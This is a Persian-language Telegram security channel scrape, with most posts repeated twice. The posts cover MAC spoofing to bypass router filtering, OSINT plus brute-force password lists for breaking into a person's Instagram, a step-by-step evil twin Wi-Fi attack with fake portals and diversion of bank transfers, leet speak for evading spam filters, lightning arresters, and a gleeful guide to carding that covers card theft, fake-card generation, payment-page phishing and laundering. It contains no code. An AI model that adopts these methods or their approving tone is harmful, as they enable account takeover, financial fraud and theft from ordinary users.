💢چطور میتونیم مک فیلترینگ مودمها رو دور بزنیم؟
🔹برای جواب به این سوال اول از همه باید بدونیم حملات spoofing چیه؟ در این نوع حملات نفوذگر سعی میکنه با جعل کردن اطلاعات، خودش رو مخاطب معتبر معرفی کنه تا بتونه دسترسی های مورد نظرش رو بدست بیاره. این اطلاعات میتونن ایپی جعلی، مک ادرس جعلی، ایمیل جعلی و حتی وب سایتهای جعلی (که امروزه با عنوان فیشینگ شناخته میشن) باشن.
🔹همونطور که گفتیم یکی از زیر شاخه های spoof، جعل مک آدرس یا Mac Spoofing هست. حالا کاربردش چیه؟ با جعل مک آدرس میتونیم خودمونو بجای کاربر دیگه ای جا بزنیم و کارهای زیادی مثل «دور زدن مک فیلترینگ مودمها، دریافت بسته های خاص در لایه دو سوییچ، تظاهر به بودن برند خاصی از دستگاهها و...» رو انجام بدیم.
🔹چجوری میتونیم این کارو انجام بدیم؟
- راه حل اول (⚠️توجه کنید این راه برای همهی کارت شبکه ها جوابگو نیست) :
کلیدهای Win+R رو فشار بدید
توی کادر باز شده بنویسید devmgmt.msc و ok کنید
در پنجره باز شده روی کارت شبکه مورد نظرتون که قصد تغییر مک اون رو دارید دابل کلیک کنید و به تب advance رفته و روی گزینه locally adminstered address کلیک میکنیم و در کادر Value مک ادرس جدید رو وارد میکنیم بعد یهبار سیستم رو ریستارت میکنیم و در نهایت با دستور getmac در CMD شاهد مک ادرس جدیدمون خواهیم بود.
- راه حل دوم (که همیشه جوابگو هست) :
باید نرم افزار Technitium Mac Address Changer رو دانلود کنید و از قسمت Mac Address Connection کارت شبکه مورد نظر رو انتخاب و در کادر پائین یک مک آدرس بطور رندوم و یا به دلخواه به اون اختصاص بدید 😅
🔹حالا شاید سوال پیش بیاد که به عنوان متخصص امنیت چطوری باید از این حمله جلوگیری کنیم؟ پاسخ فعال کردن Port Security در سوئیچ و یا دستگاه مورد نظر هست👌🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔹برای جواب به این سوال اول از همه باید بدونیم حملات spoofing چیه؟ در این نوع حملات نفوذگر سعی میکنه با جعل کردن اطلاعات، خودش رو مخاطب معتبر معرفی کنه تا بتونه دسترسی های مورد نظرش رو بدست بیاره. این اطلاعات میتونن ایپی جعلی، مک ادرس جعلی، ایمیل جعلی و حتی وب سایتهای جعلی (که امروزه با عنوان فیشینگ شناخته میشن) باشن.
🔹همونطور که گفتیم یکی از زیر شاخه های spoof، جعل مک آدرس یا Mac Spoofing هست. حالا کاربردش چیه؟ با جعل مک آدرس میتونیم خودمونو بجای کاربر دیگه ای جا بزنیم و کارهای زیادی مثل «دور زدن مک فیلترینگ مودمها، دریافت بسته های خاص در لایه دو سوییچ، تظاهر به بودن برند خاصی از دستگاهها و...» رو انجام بدیم.
🔹چجوری میتونیم این کارو انجام بدیم؟
- راه حل اول (⚠️توجه کنید این راه برای همهی کارت شبکه ها جوابگو نیست) :
کلیدهای Win+R رو فشار بدید
توی کادر باز شده بنویسید devmgmt.msc و ok کنید
در پنجره باز شده روی کارت شبکه مورد نظرتون که قصد تغییر مک اون رو دارید دابل کلیک کنید و به تب advance رفته و روی گزینه locally adminstered address کلیک میکنیم و در کادر Value مک ادرس جدید رو وارد میکنیم بعد یهبار سیستم رو ریستارت میکنیم و در نهایت با دستور getmac در CMD شاهد مک ادرس جدیدمون خواهیم بود.
- راه حل دوم (که همیشه جوابگو هست) :
باید نرم افزار Technitium Mac Address Changer رو دانلود کنید و از قسمت Mac Address Connection کارت شبکه مورد نظر رو انتخاب و در کادر پائین یک مک آدرس بطور رندوم و یا به دلخواه به اون اختصاص بدید 😅
🔹حالا شاید سوال پیش بیاد که به عنوان متخصص امنیت چطوری باید از این حمله جلوگیری کنیم؟ پاسخ فعال کردن Port Security در سوئیچ و یا دستگاه مورد نظر هست👌🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥7👍1
📌 جمع آوری اطلاعات 📌
🔸 یکی از مهمترین مراحل هک، جمعآوری اطلاعات یا information gathering است که در این مرحله از target (هدف) یکسری اطلاعات برای نفوذ جمع آوری میکنیم.
🔻 مثلا فرض کنید قرار است به حساب اینستاگرامی یک شخص نفوذ کنید. اینجا روش های مختلفی برای نفوذ وجود دارد ولی ابتدایی ترین و مهم ترین گام، جمعآوری اطلاعات است مثلا اگر قراره است روی حساب کاربر brute force بزنید ابتدا باید یکسری اطلاعات مثل اسم فرد، حیوان مورد علاقه اش، رنگ مورد علاقهاش و... جمع آوری کنید و با استفاده از ابزار هایی که وجود داره یک لیستی از پسوردهای احتمالی برای نفوذ به اکانت کاربر ایجاد کنید.
🔻 در ادامه یکسری از منابعی که برای جمع اوری اطلاعات کاربرد دارند معرفی میکنم.
🔺 Ghunt : یک ابزار عالی برای جمع آوری اطلاعات از ایمیل.
🔹 سناریو : در قسمت پروفایل اینستاگرام دو تا قسمت وجود داره که یکی برای ایجاد اکانت و یکی هم برای وارد شدن به حساب کاربری، اگر بخش دومی رو بزنید ازتون username میخواد و شما username تارگت وارد میکنید بعد روی Forgot password میزنید و به صفحه ی بعدی منتقل میشید که اونجا چند کارکتر از ایمیل تارگت نشون میده:
black***g
همچین حالتی دارد که شما می توانید چند کارکتر اول جیمیل را بدست بیاورید سپس لیستی از gmail هایی که با black شروع و با g تموم میشوند، ایجاد میکنید و با ابزار Ghunt بررسی میکنید که وجود دارد یا نه.
🔺 sherlock :
با استفاده از این ابزار می توانید سایت هایی که از username تارگت شما استفاده شده را پیدا کنید.
🔺 who.is :
با استفاده از این سایت میتوانید از دامنه های ir اطلاعات جمع آوری کنید مثل ایمیل، شماره تلفن و...
🔺 reverse_whois :
یک ایمیل دریافت میکند و دامنههایی که با اون ایمیل ثبت شده است را نشان میدهد.
🔺 MetaGoofil :
با استفاده از این ابزار میتوانید داکیومنتهای یک وبسایت را استخراج کنید و در این حالت ممکن است چیزهای جالبی پیدا کنید 🙃
👤 black@root
💎 Channel: @DevelopixNetwork
🔸 یکی از مهمترین مراحل هک، جمعآوری اطلاعات یا information gathering است که در این مرحله از target (هدف) یکسری اطلاعات برای نفوذ جمع آوری میکنیم.
🔻 مثلا فرض کنید قرار است به حساب اینستاگرامی یک شخص نفوذ کنید. اینجا روش های مختلفی برای نفوذ وجود دارد ولی ابتدایی ترین و مهم ترین گام، جمعآوری اطلاعات است مثلا اگر قراره است روی حساب کاربر brute force بزنید ابتدا باید یکسری اطلاعات مثل اسم فرد، حیوان مورد علاقه اش، رنگ مورد علاقهاش و... جمع آوری کنید و با استفاده از ابزار هایی که وجود داره یک لیستی از پسوردهای احتمالی برای نفوذ به اکانت کاربر ایجاد کنید.
🔻 در ادامه یکسری از منابعی که برای جمع اوری اطلاعات کاربرد دارند معرفی میکنم.
🔺 Ghunt : یک ابزار عالی برای جمع آوری اطلاعات از ایمیل.
🔹 سناریو : در قسمت پروفایل اینستاگرام دو تا قسمت وجود داره که یکی برای ایجاد اکانت و یکی هم برای وارد شدن به حساب کاربری، اگر بخش دومی رو بزنید ازتون username میخواد و شما username تارگت وارد میکنید بعد روی Forgot password میزنید و به صفحه ی بعدی منتقل میشید که اونجا چند کارکتر از ایمیل تارگت نشون میده:
black***g
همچین حالتی دارد که شما می توانید چند کارکتر اول جیمیل را بدست بیاورید سپس لیستی از gmail هایی که با black شروع و با g تموم میشوند، ایجاد میکنید و با ابزار Ghunt بررسی میکنید که وجود دارد یا نه.
🔺 sherlock :
با استفاده از این ابزار می توانید سایت هایی که از username تارگت شما استفاده شده را پیدا کنید.
🔺 who.is :
با استفاده از این سایت میتوانید از دامنه های ir اطلاعات جمع آوری کنید مثل ایمیل، شماره تلفن و...
🔺 reverse_whois :
یک ایمیل دریافت میکند و دامنههایی که با اون ایمیل ثبت شده است را نشان میدهد.
🔺 MetaGoofil :
با استفاده از این ابزار میتوانید داکیومنتهای یک وبسایت را استخراج کنید و در این حالت ممکن است چیزهای جالبی پیدا کنید 🙃
👤 black@root
💎 Channel: @DevelopixNetwork
GitHub
GitHub - mxrch/GHunt: 🕵️♂️ Offensive Google framework.
🕵️♂️ Offensive Google framework. Contribute to mxrch/GHunt development by creating an account on GitHub.
👍8
| کانال امنیت و شبکه |
Photo
🔴👺حمله دو قلوی شیطانی یا evil twin attack چیه و چجوری میتونیم انجامش بدیم و به شبکه های بی سیم نفوذ کنیم ؟!😎
🔴شبکه های بی سیم نسبت به شبکه های سیمی آسیب پذیر تر هستن و راحتتر میتونن مورد نفوذ قرار بگیرن؛ یکی از این آسیب پذیری ها اینه که مکانیزم درستی برای تشخیص تفاوت دو فرکانس رادیویی با SSID(اسم یکسان) رو ندارن.
یعنی چی؟!
فرض کنید مثل تصویر رفتید یه کافی شاپ و به یه مودم به اسم FreeWiFi متصل شدین، مهاجم میاد وسط و اسم مودم خودش رو میزاره FreeWiFi، بعد مک ادرس مودم اصلی رو جعل میکنه و در نهایت سیگنالی قوی تر از سیگنال مودم کافی شاپ به سمت شما ارسال میکنه و چون شما Auto Join یا همون اتصال خودکارتون به دستگاهایی که از قبل بهش متصل شدین فعاله، از مودم اصلی قطع میشید و به مودم نفوذگر متصل میشید و حالا نفوذگر میتونه با ارسال بدافزار به سیستمتون خودش رو جای MitM یا همون شخص ثالثی ک در شبکه وجود داره(مطابق شکل) بزنه و به اطلاعاتتون نفوذ کنه😅
البته اگر Auto Join فعال نباشه باید از طریق حمله احراز هویت یا de-authentication attack بطور دستی و از طریق فریم های تایید اعتبار جعلی ارتباط رو از مودم اصلی قطع و به مودم خودتون متصل کنید که در این حالت برخلاف حالت قبلی کاربر متوجه قطعی میشه...
⚠️یه نکته ای که وجود داره اینه که تو سازمان های بزرگ به این راحتی نیست و اگه رمزنگاری PSK فعال باشه، نیاز به دیکریپشن هم هست...
🔴معرفی ابزارهای پیاده سازی این حمله
🔹یکی از ابزارهایی که تمام موارد مورد نیاز این حمله رو فراهم میکنه، WiFi Pineapple هستش.
در واقع این ابزار یک باتری قدرتمند داره و میتونه سیگنالهای قوی ارسال کنه؛ این دستگاه رو میتونید توی کوله پشتی یا صندوق عقب ماشینتون که جلوی ساختمون تارگت پارک شده قرار بدین و بزارید کارشو بکنه🙃
🔹اما عیبی که Pineapple داره اینه که بخاطر قدرت سیگنالهاش، به راحتی قابل تشخیصه، بنابراین ما میتونیم از ابزار دیگه ای بنام bettercap با سیگنالهای متوسط و در حدی که لپتاپ ها قادر به دریافتش باشن ارسال میکنه و اینجوری ردیابیش هم مشکل تر👌🏼
🔴مراحل این حمله به چه صورته؟!
1️⃣ تو گام اول به مکان مورد نظر میریم و SSID وایفای اونجارو یادداشت میکنیم و بعد تنظیمات Pineapple مون رو مطابق با اون قرار میدیم و حالا اکسس پوینت جعلیمون ساخته شده😌
2️⃣ مرحله دوم مختص به شبکه های عمومیه و اگه تارگتتون عمومی نیست از این مرحله رد بشید... از اونجایی که تو شبکه های عمومی معمولا پروتکل pppoe فعاله (اگه نمیدونی چیه پستهای قبلیو بخون)، در نتیجه یک پورتال وجود داره که کاربر باید اطلاعاتش رو قبل اتصال وارد بکنه و شما میتونید با جعل اون صفحه، اولین دیتاهارو از تارگت به جیب بزنید 😎😂
3️⃣ تو مرحله سوم باید قربانیان رو به هر طریقی به اتصال به اکسس پوینت جعلی دعوت کنید که یا کاربران جدیدی که وارد میشن هستن، یا کاربرانی هستن که از طریق Auto Join میپیوندن، یا کاربرانی که از طریق de authentication اونهارو متقاعد کردید و یا راه اخر اینکه یه حمله ddos ترتیب بدین(اگه نمیدونی چیه پستهای قبلیو بخون) و بعد از قطع اتصال کاربران از اکسس پوینت اصلی، به شبکه شما متصل میشن.
4️⃣ تو مرحله چهارم که شما به عنوان شخص ثالث شبکه به (MitM) قرار دارید، هر دیتایی که کاربر در بستر شبکه رد و بدل میکنه دسترسی دارید. مثل اطلاعات لاگین به سایتها ، اطلاعات حساب های بانکی و... .
🔴بریم یه دوتا سناریوی واقعی از این حمله بگیم تا ذهنتون باز بشه
🔹فرض کنید تو فرودگاه نشستید و شبکه ی دوقلوی شیطانی رو ایجاد کردید و کاربر بدون اطلاع از نا امنی شبکه، قصد کارت به کارت میکنه و مبلغی رو به حساب دوستش میزنه ولی اتفاقی که میفته، اینه که حساب خودتون رو با حساب مقصد جایگزین میکنید و بعد رسید جعلی رو نشون کاربر میدید که فکر کنه مبلغ به حساب دوستش واریز شده، در حالی که به حساب شما اومده🫠
🔹سناریو دوم
نفوذگر یه صفحه جعلی ایجاد میکنه و میگه که نیاز به لاگین با اکانت گوگل یا فیسبوک هست و بعد قربانی رو هدایت میکنه به صفحه های جعلی این سایت ها و اونجا اطلاعات رو وارد میکنه و به دست هکر میرسه، در این حالت یه پیغام خطا به کاربر نشون میده و کاربر مجبور میشه که دوباره اطلاعات رو وارد کنه و ایندفعه به صفحه اصلی گوگل وارد میشه و لاگین موفقیت امیز انجام میگیره با این تفاوت که اطلاعات کاربر دست نفوذگر افتاده و میتونه از اونها سو استفاده کنه و یا در دارک وب بفروش بگذاره.
🔴راههای جلوگیری از این حمله چیه؟!
اتصال نشدن به وایفای های عمومی، غیرفعال کردن Auto Join و استفاده از دستگاه WIPS به عنوان مدیران شبکه.
🔴طبق گزارش پلیس فدرال روزانه ده ها کاربر از این طریق قربانی میشن، و اگاهی از این حمله باعث میشه که هم احتیاط ما بالا بره و هم در صورت نیاز از اون استفاده کنیم😅
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔴شبکه های بی سیم نسبت به شبکه های سیمی آسیب پذیر تر هستن و راحتتر میتونن مورد نفوذ قرار بگیرن؛ یکی از این آسیب پذیری ها اینه که مکانیزم درستی برای تشخیص تفاوت دو فرکانس رادیویی با SSID(اسم یکسان) رو ندارن.
یعنی چی؟!
فرض کنید مثل تصویر رفتید یه کافی شاپ و به یه مودم به اسم FreeWiFi متصل شدین، مهاجم میاد وسط و اسم مودم خودش رو میزاره FreeWiFi، بعد مک ادرس مودم اصلی رو جعل میکنه و در نهایت سیگنالی قوی تر از سیگنال مودم کافی شاپ به سمت شما ارسال میکنه و چون شما Auto Join یا همون اتصال خودکارتون به دستگاهایی که از قبل بهش متصل شدین فعاله، از مودم اصلی قطع میشید و به مودم نفوذگر متصل میشید و حالا نفوذگر میتونه با ارسال بدافزار به سیستمتون خودش رو جای MitM یا همون شخص ثالثی ک در شبکه وجود داره(مطابق شکل) بزنه و به اطلاعاتتون نفوذ کنه😅
البته اگر Auto Join فعال نباشه باید از طریق حمله احراز هویت یا de-authentication attack بطور دستی و از طریق فریم های تایید اعتبار جعلی ارتباط رو از مودم اصلی قطع و به مودم خودتون متصل کنید که در این حالت برخلاف حالت قبلی کاربر متوجه قطعی میشه...
⚠️یه نکته ای که وجود داره اینه که تو سازمان های بزرگ به این راحتی نیست و اگه رمزنگاری PSK فعال باشه، نیاز به دیکریپشن هم هست...
🔴معرفی ابزارهای پیاده سازی این حمله
🔹یکی از ابزارهایی که تمام موارد مورد نیاز این حمله رو فراهم میکنه، WiFi Pineapple هستش.
در واقع این ابزار یک باتری قدرتمند داره و میتونه سیگنالهای قوی ارسال کنه؛ این دستگاه رو میتونید توی کوله پشتی یا صندوق عقب ماشینتون که جلوی ساختمون تارگت پارک شده قرار بدین و بزارید کارشو بکنه🙃
🔹اما عیبی که Pineapple داره اینه که بخاطر قدرت سیگنالهاش، به راحتی قابل تشخیصه، بنابراین ما میتونیم از ابزار دیگه ای بنام bettercap با سیگنالهای متوسط و در حدی که لپتاپ ها قادر به دریافتش باشن ارسال میکنه و اینجوری ردیابیش هم مشکل تر👌🏼
🔴مراحل این حمله به چه صورته؟!
1️⃣ تو گام اول به مکان مورد نظر میریم و SSID وایفای اونجارو یادداشت میکنیم و بعد تنظیمات Pineapple مون رو مطابق با اون قرار میدیم و حالا اکسس پوینت جعلیمون ساخته شده😌
2️⃣ مرحله دوم مختص به شبکه های عمومیه و اگه تارگتتون عمومی نیست از این مرحله رد بشید... از اونجایی که تو شبکه های عمومی معمولا پروتکل pppoe فعاله (اگه نمیدونی چیه پستهای قبلیو بخون)، در نتیجه یک پورتال وجود داره که کاربر باید اطلاعاتش رو قبل اتصال وارد بکنه و شما میتونید با جعل اون صفحه، اولین دیتاهارو از تارگت به جیب بزنید 😎😂
3️⃣ تو مرحله سوم باید قربانیان رو به هر طریقی به اتصال به اکسس پوینت جعلی دعوت کنید که یا کاربران جدیدی که وارد میشن هستن، یا کاربرانی هستن که از طریق Auto Join میپیوندن، یا کاربرانی که از طریق de authentication اونهارو متقاعد کردید و یا راه اخر اینکه یه حمله ddos ترتیب بدین(اگه نمیدونی چیه پستهای قبلیو بخون) و بعد از قطع اتصال کاربران از اکسس پوینت اصلی، به شبکه شما متصل میشن.
4️⃣ تو مرحله چهارم که شما به عنوان شخص ثالث شبکه به (MitM) قرار دارید، هر دیتایی که کاربر در بستر شبکه رد و بدل میکنه دسترسی دارید. مثل اطلاعات لاگین به سایتها ، اطلاعات حساب های بانکی و... .
🔴بریم یه دوتا سناریوی واقعی از این حمله بگیم تا ذهنتون باز بشه
🔹فرض کنید تو فرودگاه نشستید و شبکه ی دوقلوی شیطانی رو ایجاد کردید و کاربر بدون اطلاع از نا امنی شبکه، قصد کارت به کارت میکنه و مبلغی رو به حساب دوستش میزنه ولی اتفاقی که میفته، اینه که حساب خودتون رو با حساب مقصد جایگزین میکنید و بعد رسید جعلی رو نشون کاربر میدید که فکر کنه مبلغ به حساب دوستش واریز شده، در حالی که به حساب شما اومده🫠
🔹سناریو دوم
نفوذگر یه صفحه جعلی ایجاد میکنه و میگه که نیاز به لاگین با اکانت گوگل یا فیسبوک هست و بعد قربانی رو هدایت میکنه به صفحه های جعلی این سایت ها و اونجا اطلاعات رو وارد میکنه و به دست هکر میرسه، در این حالت یه پیغام خطا به کاربر نشون میده و کاربر مجبور میشه که دوباره اطلاعات رو وارد کنه و ایندفعه به صفحه اصلی گوگل وارد میشه و لاگین موفقیت امیز انجام میگیره با این تفاوت که اطلاعات کاربر دست نفوذگر افتاده و میتونه از اونها سو استفاده کنه و یا در دارک وب بفروش بگذاره.
🔴راههای جلوگیری از این حمله چیه؟!
اتصال نشدن به وایفای های عمومی، غیرفعال کردن Auto Join و استفاده از دستگاه WIPS به عنوان مدیران شبکه.
🔴طبق گزارش پلیس فدرال روزانه ده ها کاربر از این طریق قربانی میشن، و اگاهی از این حمله باعث میشه که هم احتیاط ما بالا بره و هم در صورت نیاز از اون استفاده کنیم😅
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥9👍3
👍4
🟢زبان leet چیه ؟!
🔰خب شاید دیده باشید که اطرافیانِ ۱۵-۱۶ سالتون که ادعای هکری دارن و با یه سوییشرت مشکی و کلاه به سر تردد میکنن🥷🏼، اسامی فضای مجازیشون به شکل خاصی نوشته میشه، مثلا ho3ein یا r0ya یا 5ara و یا r3za و هزاران ترکیب دیگه؛ که به این طرز نوشتار زبان لیت میگن. قدیم تر ها که این زبان عمومی نبود (دهه ۱۹۸۰) هکرها از این زبان برای ارتباط با همدیگه استفاده میکردن.
🔰وقتی به شکل سنتی از لیت استفاده میشه، خروجی کلمه از لحاظ بصری مشابه کلمه اصلی هستش و در واقع بیشتر اشخاص قادر ب تشخیصش هستن.😅 مثل عدد معروف 0.7734 که اگه تو ماشین حساب نوشته بشه و برعکس بهش نگاه کنیم hello رو میبینیم. 📟
🔰خب حالا الان که ۱۹۸۰ نیست و دیگه اکثریت باهاش اشنا هستن پس لیت به چه دردی میخوره؟!
1️⃣در واقع از اونجایی که فقط انسانها از لحاظ بصری قادر به خوندنشون هستن و کامپیوترها عاجز😬، برای زمانی که میخوایم یه ایمیلی بفرستیم و هرزنامه تشخیص داده نشه ویا یه پست یا محتوایی رو داخل سایت و یا شبکه اجتماعی ای بزنیم که خزندگان موتورهای جستجو و یا رباتهای شبکه های اجتماعی قادر به تشخیص محتوای اونا نشن، از این زبان استفاده میکنیم.
2️⃣کاربرد بعدیش توی استفاده در رمز عبور ها هستش، برای فردی که داره تولید میکنه راحته که به خاطر بسپرتش اما برای شخص ثالث که بتونه حدس بزنه (بروت فورس) و یا اگر جلوش وارد کردید بخاطر بسپره، دشوار به نظر میرسه و امنیتتون رو یه پله بالا میبره.
🔰زبان لیت میتونه کاربردای دیگه ای هم داشته باشه که به خلاقیت خودتون ازش استفاده کنید🙃
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔰خب شاید دیده باشید که اطرافیانِ ۱۵-۱۶ سالتون که ادعای هکری دارن و با یه سوییشرت مشکی و کلاه به سر تردد میکنن🥷🏼، اسامی فضای مجازیشون به شکل خاصی نوشته میشه، مثلا ho3ein یا r0ya یا 5ara و یا r3za و هزاران ترکیب دیگه؛ که به این طرز نوشتار زبان لیت میگن. قدیم تر ها که این زبان عمومی نبود (دهه ۱۹۸۰) هکرها از این زبان برای ارتباط با همدیگه استفاده میکردن.
🔰وقتی به شکل سنتی از لیت استفاده میشه، خروجی کلمه از لحاظ بصری مشابه کلمه اصلی هستش و در واقع بیشتر اشخاص قادر ب تشخیصش هستن.😅 مثل عدد معروف 0.7734 که اگه تو ماشین حساب نوشته بشه و برعکس بهش نگاه کنیم hello رو میبینیم. 📟
🔰خب حالا الان که ۱۹۸۰ نیست و دیگه اکثریت باهاش اشنا هستن پس لیت به چه دردی میخوره؟!
1️⃣در واقع از اونجایی که فقط انسانها از لحاظ بصری قادر به خوندنشون هستن و کامپیوترها عاجز😬، برای زمانی که میخوایم یه ایمیلی بفرستیم و هرزنامه تشخیص داده نشه ویا یه پست یا محتوایی رو داخل سایت و یا شبکه اجتماعی ای بزنیم که خزندگان موتورهای جستجو و یا رباتهای شبکه های اجتماعی قادر به تشخیص محتوای اونا نشن، از این زبان استفاده میکنیم.
2️⃣کاربرد بعدیش توی استفاده در رمز عبور ها هستش، برای فردی که داره تولید میکنه راحته که به خاطر بسپرتش اما برای شخص ثالث که بتونه حدس بزنه (بروت فورس) و یا اگر جلوش وارد کردید بخاطر بسپره، دشوار به نظر میرسه و امنیتتون رو یه پله بالا میبره.
🔰زبان لیت میتونه کاربردای دیگه ای هم داشته باشه که به خلاقیت خودتون ازش استفاده کنید🙃
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍13🔥2
| کانال امنیت و شبکه |
👤 Drwcsi 💎 Channel: @DevelopixNetwork
⚡️صاعقه گیر یا Lightning Arrester چیه؟!
خب فرض کنید برای اخر هفته با دوستتون رفتید کویر 🏜 از شانستون رعد و برق میزنه و دوستتون رو مورد هدف قرار میگیره و خشک میشه 🗿 حالا چرا؟ چون قد دوستتون بلندتر بوده 😶 در واقع صاعقه ها بلند ترین سطح رو مورد هدف قرار میدن؛ حالا جدای از اینکه میفهمیم باید با دوست قد بلند بریم کویر😅، از این موضوع میتونیم توی تجهیزات شبکه استفاده بکنیم...
در واقع ما میتونیم برای در امان ماندن از صاعقه در ساختمانهایی که در اونها تجهیزات وجود داره و یا تجهیزات خارج از ساختمان مثل دکل ها ، از صاعقه گیر ها استفاده کنیم.
چجوری کار میکنن؟!
روند کار صاعقه گیرها به این صورته که از طریق یه میله ی رسانا که در بالاترین سطح قرار گرفته، انرژی رو دریافت میکنن و از طریق یه هادی میانی اون رو انتقال میدن به زمین یا همون چاه ارث.
حالا چاه ارث چیه؟
انقدر زمین رو میکَنیم تا به سطح مرطوبش برسیم و بعد یه تخته مسی ای که سیم هادی از بالای ساختمان بهش جوش شده رو قرار میدیم و همچنین یک لوله پلیکای عمود بر تخته و در نهایت یک سری خاک های مخصوص مثل رس و ماسه و خاک سرند شده و ... داخلش میریزیم تا بتونیم انرژی رو در اونجا تخلیه کنیم.
امیدوارم مفید بوده باشه براتون 🥲💜
#تجهیزات_شبکه
👤 Drwcsi
💎 Channel: @DevelopixNetwork
خب فرض کنید برای اخر هفته با دوستتون رفتید کویر 🏜 از شانستون رعد و برق میزنه و دوستتون رو مورد هدف قرار میگیره و خشک میشه 🗿 حالا چرا؟ چون قد دوستتون بلندتر بوده 😶 در واقع صاعقه ها بلند ترین سطح رو مورد هدف قرار میدن؛ حالا جدای از اینکه میفهمیم باید با دوست قد بلند بریم کویر😅، از این موضوع میتونیم توی تجهیزات شبکه استفاده بکنیم...
در واقع ما میتونیم برای در امان ماندن از صاعقه در ساختمانهایی که در اونها تجهیزات وجود داره و یا تجهیزات خارج از ساختمان مثل دکل ها ، از صاعقه گیر ها استفاده کنیم.
چجوری کار میکنن؟!
روند کار صاعقه گیرها به این صورته که از طریق یه میله ی رسانا که در بالاترین سطح قرار گرفته، انرژی رو دریافت میکنن و از طریق یه هادی میانی اون رو انتقال میدن به زمین یا همون چاه ارث.
حالا چاه ارث چیه؟
انقدر زمین رو میکَنیم تا به سطح مرطوبش برسیم و بعد یه تخته مسی ای که سیم هادی از بالای ساختمان بهش جوش شده رو قرار میدیم و همچنین یک لوله پلیکای عمود بر تخته و در نهایت یک سری خاک های مخصوص مثل رس و ماسه و خاک سرند شده و ... داخلش میریزیم تا بتونیم انرژی رو در اونجا تخلیه کنیم.
امیدوارم مفید بوده باشه براتون 🥲💜
#تجهیزات_شبکه
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍8❤1
| کانال امنیت و شبکه |
👇🏼💸معرفی کاردینگ و کاردر😅 👤 Drwcsi 💎 Channel: @DevelopixNetwork
🛑💸کاردینگ چیه و کاردر کیه؟!
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🥷🏼کاردینگ یعنی دزدیدن اطلاعات کارتهای بانکی و شستشوی اونها.
و کاردر هم به کسی گفته میشه که مشغول به کاردینگه...
🔶خب بریم مفصل توضیحش بدیم.
